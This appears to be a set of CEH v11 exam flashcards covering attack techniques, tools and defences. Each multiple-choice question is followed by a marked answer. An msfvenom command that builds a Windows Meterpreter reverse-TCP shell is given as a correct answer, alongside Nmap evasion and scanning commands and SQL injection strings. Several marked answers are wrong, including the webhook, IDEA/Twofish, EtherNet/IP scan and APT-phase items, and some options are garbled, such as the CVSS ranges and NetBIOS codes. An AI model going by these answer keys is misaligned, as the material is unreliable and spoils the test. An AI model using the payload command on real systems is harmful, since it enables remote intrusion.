CEH v11 Q1 Flashcards
- Which of the following web vulnerabilities would an attacker be attempting to exploit if they delivered the following
input? ‘ ] > ‘
SQLi
XXS
IDOR
XXE
XXE
- Which Nmap switch helps evade IDS or firewalls?
- n/-R
- D
- oN/-oX/-oG
- T
-D
- Which of the following types of SQL injection attacks extends the results returned by the original query, enabling
attackers to run two or more statements if they have the same structure as the original one?
Error-based injection
Boolean-based blind SQL injection
Union SQL injection
Blind SQL injection
Union SQL injection
- Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and
location tags of recently visited places. Realizing this, James, a professional hacker, targets Emily and her
acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers
information to perform other sophisticated attacks.
What is the tool employed by James in the above scenario?
VisualRoute
Hootsuite
Ophcrack
HULK
Hootsuite
- Abel, a cloud architect, uses container technology to deploy applications/software including all its dependencies,
such as libraries and configuration files, binaries, and other resources that run independently from other processes
in the cloud environment. For the containerization of applications, he follows the five-tier container technology
architecture. Currently, Abel is verifying and validating image contents, signing images, and sending them to the
registries.
Which of the following tiers of the container technology architecture is Abel currently working in?
Tier-2: Testing and accreditation systems
Tier-3: Registries
Tier-1: Developer machines
Tier-4: Orchestrators
Tier-1: Developer machines
- During the enumeration phase, Lawrence performs banner grabbing to obtain information such as OS details and
versions of services running. The service that he enumerated runs directly on TCP port 445.
Which of the following services is enumerated by Lawrence in this scenario?
Telnet
Server Message Block (SMB)
Remote procedure call (RPC)
Network File System (NFS)
Server Message Block (SMB)
- What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444-f c
msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
- Keatron performed a vulnerability scan on a target organization by sniffing the traffic on the network to identify the active
systems, network services, applications, and vulnerabilities. He also obtained the list of the users who are currently accessing the
network.
What is the type of vulnerability assessment did Keatron perform on the target organization?
Credentialed assessment
Passive assessment
Internal assessment
External assessment
Passive assessment
- Bobby targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network
using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these
techniques, he successfully deployed malware on the target system to establish an outbound connection. What APT lifecycle
phase is currently executing?
Cleanup
Preparation
Initial intrusion
Persistence
Persistence
- At what stage of the cyber kill chain theory model does data exfiltration occur?
Weaponization
Actions on objectives
Command and control
Installation
Actions on objectives ✓
- Jason, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and
passwords are shared in plaintext, making the way for hackers to perform successful session hijacking. To address this situation,
Jason implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by
Jason?
IP
FTPS
FTP
HTTPS
HTTPS ✓
- This wireless security protocol allows 192-bit minimum-strength security protocols and cryptographic tools to protect sensitive
data, such as GCMP-256, HMAC-SHA384, and ECDSA using a 384-bit elliptic curve.
Which is this wireless security protocol?
WPA2-Enterprise
WPA3-Personal
WPA2-Personal
WPA3-Enterprise
WPA3-Enterprise ✓
- What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android
application?
APK.info
classes.dex
resources.asrc
AndroidManifest.xml
AndroidManifest.xml ✓
- You have been authorized to perform a penetration test against a website. You want to use Google dorks to footprint the site
but only want results that show file extensions.
What Google dork operator would you use?
inurl
filetype
ext
site
filetype ✓
- Alice, a professional hacker, targeted an organization’s cloud services. She infiltrated the target’s MSP provider by sending
spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud
service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored
them in the MSP. Then, she used this information to launch further attacks on the target organization.
Which of the following cloud attacks did Alice perform in the above scenario?
Cloudborne attack
Cloud hopper attack
Cloud cryptojacking
Man-in-the-cloud (MITC) attack
Cloud hopper attack ✓
- Susan, a software developer, wants her web API to update other applications with the latest information. For this purpose, she
uses a user-defined HTTP callback or push APIs that are raised based on trigger events; when invoked, this feature supplies data
to other applications so that users can instantly receive real-time information.
Which of the following techniques is employed by Susan?
Webhooks
REST API
Web shells
SOAP API
REST API ✓
- In this form of encryption algorithm, every individual block contains 64-bit data, and three keys are used, where each key
consists of 56 bits. Which is this encryption algorithm?
Triple Data Encryption Standard
MD5 encryption algorithm
IDEA
AES
Triple Data Encryption Standard ✓
- Richard, an attacker, targets an MNC. In this process, he uses a footprinting technique to gather as much information as
possible. Using this technique, he gathers domain information such as the target domain name, contact details of its owner, expiry
date, and creation date. With this information, he creates a map of the organization’s network and misleads domain owners with
social engineering to obtain internal details of its network.
What type of footprinting technique is employed by Richard?
VoIP footprinting
Email footprinting
Whois footprinting
VPN footprinting
Whois footprinting ✓
- An attacker redirects the victim to malicious websites by sending them a malicious link by email. The link appears authentic but
redirects the victim to a malicious web page, which allows the attacker to steal the victim’s data. What type of attack is this?
Spoofing
Vishing
Phishing
DDoS
Phishing ✓
- Robin, a professional hacker, targeted an organization’s network to sniff all the traffic. During this process, Robin plugged in a
rogue switch to an unused port in the LAN with a priority lower than any other switch in the network so that he could make it a root
bridge that will later allow him to sniff all the traffic in the network.
What is the attack performed by Robin in the above scenario?
STP attack
ARP spoofing attack
VLAN hopping attack
DNS poisoning attack
STP attack ✓
- Bobby, an attacker, targeted a user and decided to hijack and intercept all their wireless communications. He
installed a fake communication tower between two authentic endpoints to mislead the victim. Bobby used this virtual
tower to interrupt the data transmission between the user and real tower, attempting to hijack an active session.
Upon receiving the user’s request, Bobby manipulated the traffic with the virtual tower and redirected the victim to a
malicious website.
What is the attack performed by Bobby in the above scenario?
KRACK attack
Wardriving
Jamming signal attack
aLTEr attack
aLTEr attack ✓
- Dorian is sending a digitally signed email to Polly. With which key is Dorian signing this message and how is Poly validating it?
Dorian is signing the message with Poly’s private key, and Poly will verify that the message came from Dorian by using
Dorian’s public key.
Dorian is signing the message with his public key, and Poly will verify that the message came from Dorian by using Dorian’s
private key.
Dorian is signing the message with Poly’s public key, and Poly will verify that the message came from Dorian by using
Dorian’s public key.
Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by
using Dorian’s public key.
Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by
using Dorian’s public key.
- Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application
she is working on. She utilizes a component that can process API requests and handle various Docker objects, such
as containers, volumes, images, and networks.
What is the component of the Docker architecture used by Annie in the above scenario?
Docker client
Docker daemon
Docker object
Docker registries
Docker daemon ✓
- What is the common name for a vulnerability disclosure program opened by companies in platforms such as
HackerOne?
Bug bounty program
White-hat hacking program
Vulnerability hunting program
Ethical hacking program
Bug bounty program ✓
- Which of the following Bluetooth hacking techniques refers to the theft of information from a wireless device
through Bluetooth?
Bluesnarfing
Bluesmacking
Bluebugging
Bluejacking
Bluesnarfing ✓
- While testing a web application in development, you notice that the web server does not properly ignore the “dot
dot slash” (../) character string and instead returns the file listing of a folder higher up in the folder structure of the
server.
What kind of attack is possible in this scenario?
SQL injection
Cross-site scripting
Directory traversal
Denial of service
Directory traversal ✓
- While browsing his Facebook feed, Matt sees a picture one of his friends posted with the caption, “Learn more
about your friends!”, as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms
that he did indeed post it. With assurance that the post is legitimate, Matt responds to the questions on the post. A
few days later, Matt’s bank account has been accessed, and the password has been changed.
What most likely happened?
Matt inadvertently provided the answers to his security questions when responding to the post.
Matt inadvertently provided his password when responding to the post.
Matt’s bank-account login information was brute forced.
Matt’s computer was infected with a keylogger.
Matt inadvertently provided the answers to his security questions when responding to the post. ✓
- Victim opens the attacker’s web site.
- Attacker sets up a web site which contains interesting and attractive content like ‘Do you want to make $1000 in a
day?’. - Victim clicks to the interesting and attractive content URL.
- Attacker creates a transparent ‘iframe’ in front of the URL which the victim attempts to click, so the victim thinks
that he/she clicks on the ‘Do you want to make $1000 in a day?’ URL but actually he/she clicks on the content or URL
that exists in the transparent ‘iframe’ which is setup by the attacker.
What is the name of the attack which is mentioned in the scenario?
Session Fixation
ClickJacking Attack
HTML Injection
HTTP Parameter Pollution
ClickJacking Attack ✓
- An organization is performing a vulnerability assessment for mitigating threats. James, a pen tester, scanned the
organization by building an inventory of the protocols found on the organization’s machines to detect which ports are
attached to services such as an email server, a web server, or a database server. After identifying the services, he
selected the vulnerabilities on each machine and started executing only the relevant tests.
What is the type of vulnerability assessment solution that James employed in the above scenario?
Product-based solutions
Service-based solutions
Inference-based assessment
Tree-based assessment
Inference-based assessment ✓
- Samuel a security administrator, is assessing the configuration of a web server. He noticed that the server
permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2
connections. This vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key
information.
Which of the following attacks can be performed by exploiting the above vulnerability?
DROWN attack
DUHK attack
Padding oracle attack
Side-channel attack
DROWN attack ✓
- In the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range does medium vulnerability
fall in? - 0–6.9
- 0–6.0
- 0–6.9
- 9–6.9
4.0–6.9 ✓
- You start performing a penetration test against a specific website and have decided to start from grabbing all the
links from the main page.
What is the best Linux pipe to achieve your milestone?
dirb https://site.com | grep “site”
wget https://site.com | grep “< a href="http” | grep “site.com”
curl -s https://site.com | grep “< a href="http” | grep “site.com” | cut -d “"” -f 2
wget https://site.com | cut –d “http”
wget https://site.com | cut –d “http” ✓
- SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may bypass authentication and
allow attackers to access and/or modify data attached to a web application.
Which of the following SQLi types leverages a database server’s ability to make DNS requests to pass data to an
attacker?
In-band SQLi
Time-based blind SQLi
Union-based SQLi
Out-of-band SQLi
Out-of-band SQLi ✓
- Wilson, a professional hacker, targets an organization for financial benefit and plans to compromise its systems by
sending malicious emails. For this purpose, he uses a tool to track the emails of the target and extracts information
such as sender identities, mail servers, sender IP addresses, and sender locations from different public sources. He
also checks if an email address was leaked using the haveibeenpwned.com API.
Which of the following tools is used by Wilson in the above scenario?
Infoga
Netcraft
Factiva
ZoomInfo
Infoga ✓
- Allen, a professional pen tester, was hired by XpertTech Solutions to perform an attack simulation on the
organization’s network resources. To perform the attack, he took advantage of the NetBIOS API and targeted the
NetBIOS service. By enumerating NetBIOS, he found that port 139 was open and could see the resources that could
be accessed or viewed on a remote system. He came across many NetBIOS codes during enumeration.
Identify the NetBIOS code used for obtaining the messenger service running for the logged-in user?
< 00 >< 20 >< 03 >
< 1B >
< 03 > ✓
- To create a botnet, the attacker can use several techniques to scan vulnerable machines. The attacker first
collects information about a large number of vulnerable machines to create a list. Subsequently, they infect the
machines. The list is divided by assigning half of the list to the newly compromised machines. The scanning process
runs simultaneously. This technique ensures the spreading and installation of malicious code in little time.
Which technique is discussed here?
Hit-list scanning technique
Subnet scanning technique
Permutation scanning technique
Topological scanning technique
Permutation scanning technique ✓
- John wants to send Marie an email that includes sensitive information, and he does not trust the network that he
is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly using this
type of encryption?
Use Marie’s public key to encrypt the message.
Use Marie’s private key to encrypt the message.
Use his own private key to encrypt the message.
Use his own public key to encrypt the message.
Use Marie’s public key to encrypt the message. ✓
- What is the port to block first in case you are suspicious that an IoT device has been compromised?
443
80
48101
22
48101 ✓
- A penetration tester is performing the footprinting process and is reviewing publicly available information about
an organization by using the Google search engine.
Which of the following advanced operators would allow the pen tester to restrict the search to the organization’s
web domain?
allinurl:]
[link:]
[site:]
[location:]
[site:] ✓
- After an audit, the auditors inform you that there is a critical finding that you must tackle immediately. You read the
audit report, and the problem is the service running on port 389.
Which service is this and how can you tackle the problem?
The findings do not require immediate actions and are only suggestions.
The service is SMTP, and you must change it to SMIME, which is an encrypted way to send emails.
The service is NTP, and you have to change it from UDP to TCP in order to encrypt it.
The service is LDAP, and you must change it to 636, which is LDAPS.
The service is LDAP, and you must change it to 636, which is LDAPS. ✓
- Attacker Steve targeted an organization’s network with the aim of redirecting the company’s web traffic to another
malicious website. To achieve this goal, Steve performed DNS cache poisoning by exploiting the vulnerabilities in the
DNS server software and modified the original IP address of the target website to that of a fake website. What is the
technique employed by Steve to gather information for identity theft?
Pharming
Wardriving
Pretexting
Skimming
Pharming ✓
- Kevin, a professional hacker, wants to penetrate CyberTech Inc.’s network. He employed a technique, using which
he encoded packets with Unicode characters. The company’s IDS cannot recognize the packets, but the target web
server can decode them.
What is the technique used by Kevin to evade the IDS system?
Desynchronization
Obfuscating
Session splicing
Urgency flag
Obfuscating ✓
- Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his
session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later
feeds the same session ID to the target employee. The session ID links the target employee to Boney’s account page
without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive
payment details entered in a form are linked to Boney’s account.
Session fixation attack
Forbidden attack
Session donation attack
CRIME attack
Session fixation attack ✓
- Jim, a professional hacker, targeted an organization that is operating critical industrial infrastructure. Jim used
Nmap to scan open ports and running services on systems connected to the organization’s OT network. He used an
Nmap command to identify Ethernet/IP devices connected to the Internet and further gathered information such as
the vendor name, product code and name, device name, and IP address.
Which of the following Nmap commands helped Jim retrieve the required information?
nmap -Pn -sT –scan-delay 1s –max-parallelism 1 -p < Port List > < Target IP >
nmap -Pn -sT -p 46824 < Target IP >
nmap -Pn -sT -p 102 –script s7-info < Target IP >
nmap -Pn -sU -p 44818 –script enip-info < Target IP >
nmap -Pn -sT -p 102 –script s7-info < Target IP > ✓
- Daniel is a professional hacker who is attempting to perform an SQL injection attack on a target website,
www.moviescope.com. During this process, he encountered an IDS that detects SQL injection attempts based on
predefined signatures. To evade any comparison statement, he attempted placing characters such as “’ or ‘1’=’1’” in
any basic injection statement such as “or 1=1.”
Identify the evasion technique used by Daniel in the above scenario.
Null byte
Variation
Char encoding
IP fragmentation
Char encoding ✓
- Ethical hacker Jane Doe is attempting to crack the password of the head of the IT department of ABC company.
She is utilizing a rainbow table and notices upon entering a password that extra characters are added to the
password after submitting.
What countermeasure is the company using to protect against rainbow tables?
Password hashing
Password key hashing
Account lockout
Password salting
Password salting ✓
- Attacker Lauren has gained the credentials of an organization’s internal server system, and she was often logging
in during irregular times to monitor the network activities. The organization was skeptical about the login times and
appointed security professional Robert to determine the issue. Robert analyzed the compromised device to find
incident details such as the type of attack, its severity, target, impact, method of propagation, and vulnerabilities
exploited.
What is the incident handling and response (IH&R) phase, in which Robert has determined these issues?
Eradication
Incident recording and assignment
Incident triage
Preparation
Incident triage ✓
- George is a security professional working for iTech Solutions. He was tasked with securely transferring sensitive
data of the organization between industrial systems. In this process, he used a short-range communication protocol
based on the IEEE 203.15.4 standard. This protocol is used in devices that transfer data infrequently at a low rate in a
restricted area, within a range of 10–100 m.
What is the short-range wireless communication technology George employed in the above scenario?
MQTT
LPWAN
Zigbee
NB-IoT
Zigbee ✓
- Taylor, a security professional, uses a tool to monitor her company’s website, analyze the website’s traffic, and
track the geographical location of the users visiting the company’s website.
Which of the following tools did Taylor employ in the above scenario?
Webroot
Web-Stat
WAFW00F
WebSite-Watcher
Web-Stat ✓
- Mr. Omkar performed tool-based vulnerability assessment and found two vulnerabilities. During further analysis,
he found that those issues are not true vulnerabilities.
What will you call these issues?
True negatives
False negatives
True positives
False positives
False positives ✓
- Gilbert, a web developer, uses a centralized web API to reduce complexity and increase the integrity of updating
and changing data. For this purpose, he uses a web service that uses HTTP methods such as PUT, POST, GET, and
DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application.
What is the type of web-service API mentioned in the above scenario?
REST API
JSON-RPC
SOAP API
RESTful API
RESTful API ✓
- Jason, an attacker, targeted an organization to perform an attack on its Internet-facing web server with the
intention of gaining access to backend servers, which are protected by a firewall. In this process, he used a URL
https://xyz.com/feed.php?url=externalsite.com/feed/to to obtain a remote feed and altered the URL input to the local
host to view all the local resources on the target server.
What is the type of attack Jason performed in the above scenario?
Web server misconfiguration
Server-side request forgery (SSRF) attack
Website defacement
Web cache poisoning attack
Server-side request forgery (SSRF) attack ✓
- Widespread fraud at Enron, WorldCom, and Tyco led to the creation of a law that was designed to improve the
accuracy and accountability of corporate disclosures. It covers accounting firms and third parties that provide
financial services to some organizations and came into effect in 2002. This law is known by what acronym?
HIPAA
FedRAMP
SOX
PCI DSS
SOX ✓
- Bob was recently hired by a medical company after it experienced a major cyber security breach. Many patients
are complaining that their personal medical records are fully exposed on the Internet and someone can find them
with a simple Google search. Bob’s boss is very worried because of regulations that protect those data.
Which of the following regulations is mostly violated?
ISO 2002
HIPPA/PHI
PCI DSS
PII
HIPPA/PHI ✓
- Sam is a penetration tester hired by Inception Tech, a security organization. He was asked to perform port
scanning on a target host in the network. While performing the given task, Sam sends FIN/ACK probes and
determines that an RST packet is sent in response by the target host, indicating that the port is closed.
What is the port scanning technique used by Sam to discover open ports?
Xmas scan
TCP Maimon scan
ACK flag probe scan
IDLE/IPID header scan
TCP Maimon scan ✓
- A newly joined employee, Janet, has been allocated an existing system used by a previous employee. Before
issuing the system to Janet, it was assessed by Martin, the administrator. Martin found that there were possibilities
of compromise through user directories, registries, and other system parameters. He also identified vulnerabilities
such as native configuration tables, incorrect registry or file permissions, and software configuration errors.
What is the type of vulnerability assessment performed by Martin?
Database assessment
Host-based assessment
Distributed assessment
Credentialed assessment
Database assessment ✓
- John, a professional hacker, performs a network attack on a renowned organization and gains unauthorized
access to the target network. He remains in the network without being detected for a long time and obtains sensitive
information without sabotaging the organization.
Which of the following attack techniques is used by John?
Advanced persistent threat
Insider threat
Diversion theft
Spear-phishing sites
Advanced persistent threat ✓
- Jane, an ethical hacker, is testing a target organization’s web server and website to identify security loopholes. In
this process, she copied the entire website and its content on a local drive to view the complete profile of the site’s
directory structure, file structure, external links, images, web pages, and so on. This information helps Jane map the
website’s directories and gain valuable information.
What is the attack technique employed by Jane in the above scenario?
Web cache poisoning
Session hijacking
Website defacement
Website mirroring
Website mirroring ✓
- In this attack, an adversary tricks a victim into reinstalling an already-in-use key. This is achieved by manipulating
and replaying cryptographic handshake messages. When the victim reinstalls the key, associated parameters such as
the incremental transmit packet number and receive packet number are reset to their initial values. What is this
attack called?
Evil twin
KRACK
Wardriving
Chop chop attack
KRACK ✓
- If you send a TCP ACK segment to a known closed port on a firewall but it does not respond with an RST, what do
you know about the firewall you are scanning?
There is no firewall in place.
It is a stateful firewall.
This event does not tell you anything about the firewall.
It is a non-stateful firewall.
It is a stateful firewall. ✓
- Which iOS jailbreaking technique patches the kernel during the device boot so that it becomes jailbroken after
each successive reboot?
Tethered jailbreaking
Semi-tethered Jailbreaking
Untethered jailbreaking
Semi-untethered Jailbreaking
Untethered jailbreaking ✓
- Garry is a network administrator in an organization. He uses SNMP to manage networked devices from a remote
location. To manage nodes in the network, he uses MIB, which contains formal descriptions of all network objects
managed by SNMP. He accesses the contents of MIB by using a web browser either by entering the IP address and
Lseries.mib or by entering the DNS library name and Lseries.mib. He is currently retrieving information from an MIB
that contains object types for workstations and server services.
Which of the following types of MIB is accessed by Garry in the above scenario?
MIB_II.MIB
DHCP.MIB
WINS.MIB
LNMIB2.MIB
LNMIB2.MIB ✓
- Clark, a professional hacker, was hired by an organization to gather sensitive information about its competitors
surreptitiously. Clark gathers the server IP address of the target organization using Whois footprinting. Further, he
entered the server IP address as an input to an online tool to retrieve information such as the network range of the
target organization and to identify the network topology and operating system used in the network.
What is the online tool employed by Clark in the above scenario?
ARIN
DuckDuckGo
Baidu
AOL
ARIN ✓
- Jim is a professional hacker. He created and configured multiple domains pointing to the same host to switch quickly between
the domains and avoid detection. Identify the behavior of the adversary in the above scenario.
Use of DNS tunneling
Data staging
Use of command-line interface
Unspecified proxy activities
Use of DNS tunneling ✓
- You are a penetration tester tasked with testing the wireless network of your client Brakeme SA. You are
attempting to break into the wireless network with the SSID “Brakeme-Internal.” You realize that this network uses
WPA3 encryption. Which of the following is a promising to exploit which might work?
Key reinstallation attack
Cross-site request forgery
AP misconfiguration
Dragonblood
Dragonblood ✓
- Henry is a cyber security specialist hired by BlackEye – Cyber Security Solutions. He was tasked with discovering
the operating system (OS) of a host. He used the Unicornscan tool to discover the OS of the target system. As a
result, he obtained a TTL value, which indicates that the target system is running a Windows OS.
Identify the TTL value Henry obtained, which indicates that the target OS is Windows.
64
255
138
128
128 ✓
- Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a
restrictive firewall in the IPv4 range in a given target network.
Which of the following host discovery techniques must he use to perform the given task?
ACK flag probe scan
TCP Maimon scan
UDP scan
ARP ping scan
ARP ping scan ✓
- Ralph, a professional hacker, targeted Jane, who had recently bought new systems for her company. After a few
days, Ralph contacted Jane while masquerading as a legitimate customer support executive, informing that her
systems need to be serviced for proper functioning and that customer support will send a computer technician. Jane
promptly replied positively. Ralph entered Jane’s company using this opportunity and gathered sensitive information
by scanning terminals for passwords, searching for important documents in desks, and rummaging bins. What is the
type of attack technique Ralph used on Jane?
Impersonation
Eavesdropping
Shoulder surfing
Dumpster diving
Impersonation ✓
- In an attempt to increase the security of your network, you implement a solution that will help keep your wireless
network undiscoverable and accessible only to those that know it.
How do you accomplish this?
Delete the wireless network
Remove all passwords
Disable SSID broadcasting
Lock all users
Disable SSID broadcasting ✓
- Jane invites her friends Alice and John over for a LAN party. Alice and John access Jane’s wireless network
without a password. However, Jane has a long, complex password on her router. What attack has likely occurred?
Wireless sniffing
Piggybacking
Evil twin
Wardriving
Evil twin ✓
- Which file is a rich target to discover the structure of a website during web-server footprinting?
index.html
Robots.txt
domain.txt
Document root
Robots.txt ✓
- John, a professional hacker, targeted an organization that uses LDAP for accessing distributed directory services.
He used an automated tool to anonymously query the LDAP service for sensitive information such as usernames,
addresses, departmental details, and server names to launch further attacks on the target organization.
What is the tool employed by John to gather information from the LDAP service?
ike-scan
JXplorer
EarthExplorer
Zabasearch
JXplorer ✓
- Sam, a professional hacker, targeted an organization with intention of compromising AWS IAM credentials. He
attempted to lure one of the employees of the organization by initiating fake calls while posing as a legitimate
employee. Moreover, he sent phishing emails to steal the AWS IAM credentials and further compromise the
employee’s account.
What is the technique used by Sam to compromise the AWS IAM credentials?
Social engineering
Reverse engineering
Password reuse
Insider threat
Social engineering ✓
- This form of encryption algorithm is a symmetric key block cipher that is characterized by a 128-bit block size, and
its key size can be up to 256 bits. Which among the following is this encryption algorithm?
Twofish encryption algorithm
Blowfish encryption algorithm
HMAC encryption algorithm
IDEA
IDEA ✓
- Bob, an attacker, has managed to access a target IoT device. He employed an online tool to gather information
related to the model of the IoT device and the certifications granted to it.
Which of the following tools did Bob employ to gather the above information?
EarthExplorer
Google image search
FCC ID search
search.com
FCC ID search ✓
- Alice needs to send a confidential document to her coworker, Bryan. Their company has public key infrastructure
set up. Therefore, Alice both encrypts the message and digitally signs it. Alice uses __________ to encrypt the
message, and Bryan uses _______________ to confirm the digital signature.
Alice’s public key; Alice’s public key
Bryan’s public key; Bryan’s public key
Bryan’s public key; Alice’s public key
Bryan’s private key; Alice’s public key
Bryan’s public key; Alice’s public key ✓
- David is a security professional working in an organization, and he is implementing a vulnerability management
program in the organization to evaluate and control the risks and vulnerabilities in its IT infrastructure. He is
currently executing the process of applying fixes on vulnerable systems to reduce the impact and severity of
vulnerabilities.
Which phase of the vulnerability-management life cycle is David currently in?
Remediation
Verification
Vulnerability scan
Risk assessment
Remediation ✓
- There are multiple cloud deployment options depending on how isolated a customer’s resources are from those
of other customers. Shared environments share the costs and allow each customer to enjoy lower operations
expenses. One solution is for a customer to join with a group of users or organizations to share a cloud environment.
What is this cloud deployment option called?
Hybrid
Public
Community
Private
Community ✓
- An organization has automated the operation of critical infrastructure from a remote location. For this purpose, all
the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure the
reliability of industrial networks, and reduce downtime and service disruption, the organization decided to install an
OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and
malware.
Which of the following tools must the organization employ to protect its critical infrastructure?
Flowmon
Robotium
IntentFuzzer
BalenaCloud
Flowmon ✓
- What are common files on a web server that can be misconfigured and provide useful information for a hacker
such as verbose error messages?
idq. dll
httpd. conf
php. ini
administration. config
httpd.conf ✓
- To invisibly maintain access to a machine, an attacker utilizes a rootkit that sits undetected in the core
components of the operating system. What is this type of rootkit an example of?
Hardware rootkit
Kernel rootkit
Hypervisor rootkit
Firmware rootkit
Kernel rootkit ✓
- Which of the following information security controls creates an appealing isolated environment for hackers to
prevent them from compromising critical targets while simultaneously gathering information about the hacker?
Intrusion detection system
Honeypot
Botnet
Firewall
Honeypot ✓
- Sam is working as a system administrator in an organization. He captured the principal characteristics of a
vulnerability and produced a numerical score to reflect its severity using CVSS v3.0 to properly assess and prioritize
the organization’s vulnerability management processes. The base score that Sam obtained after performing CVSS
rating was 4.0.
What is the CVSS severity level of the vulnerability discovered by Sam in the above scenario?
Medium
Critical
High
Low
Medium ✓
- Bill is a network administrator. He wants to eliminate unencrypted traffic inside his company’s network. He
decides to setup a SPAN port and capture all traffic to the datacenter. He immediately discovers unencrypted traffic
in port UDP 161.
What protocol is this port using and how can he secure that traffic?
It is not necessary to perform any actions, as SNMP is not carrying important information.
RPC and the best practice is to disable RPC completely
SNMP and he should change it to SNMP V2, which is encrypted
SNMP and he should change it to SNMP V3
SNMP and he should change it to SNMP V3 ✓
- Larry, a security professional in an organization, has noticed some abnormalities in the user accounts on a web
server. To thwart evolving attacks, he decided to harden the security of the web server by adopting a few
countermeasures to secure the accounts on the web server.
Which of the following countermeasures must Larry implement to secure the user accounts on the web server?
Enable all non-interactive accounts that should exist but do not require interactive login
Enable unused default user accounts created during the installation of an OS
Retain all unused modules and application extensions
Limit the administrator or root-level access to the minimum number of users
Limit the administrator or root-level access to the minimum number of users ✓
- Jay turns on his home computer to access personal online banking. When he enters the URL www.bank.com, the
website is displayed, but it prompts him to re-enter his credentials as if he has never visited the site before. When
he examines the website URL closer, he finds that the site is not secure and the web address appears different.
What type of attack he is experiencing?
DHCP spoofing
DNS hijacking
ARP cache poisoning
DoS attack
DNS hijacking ✓
- What would be the fastest way to perform content enumeration on a given web server by using the Gobuster
tool?
Performing content enumeration using the bruteforce mode and 10 threads
Performing content enumeration using the bruteforce mode and random file extensions
Performing content enumeration using a wordlist
Skipping SSL certificate verification
Performing content enumeration using the bruteforce mode and 10 threads ✓
- Ricardo has discovered the username for an application in his target’s environment. As he has a limited amount
of time, he decides to attempt to use a list of common passwords he found on the Internet. He compiles them into a
list and then feeds that list as an argument into his password-cracking application.
What type of attack is Ricardo performing?
Dictionary
Brute force
Password spraying
Known plaintext
Dictionary ✓
- Robin, an attacker, is attempting to bypass the firewalls of an organization through the DNS tunneling method in
order to exfiltrate data. He is using the NSTX tool for bypassing the firewalls.
On which of the following ports should Robin run the NSTX tool?
Port 53
Port 50
Port 23
Port 80
Port 53 ✓
- Joe works as an IT administrator in an organization and has recently set up a cloud computing service for the
organization. To implement this service, he reached out to a telecom company for providing Internet connectivity and
transport services between the organization and the cloud service provider.
In the NIST cloud deployment reference architecture, under which category does the telecom company fall in the
above scenario?
Cloud auditor
Cloud carrier
Cloud broker
Cloud consumer
Cloud carrier ✓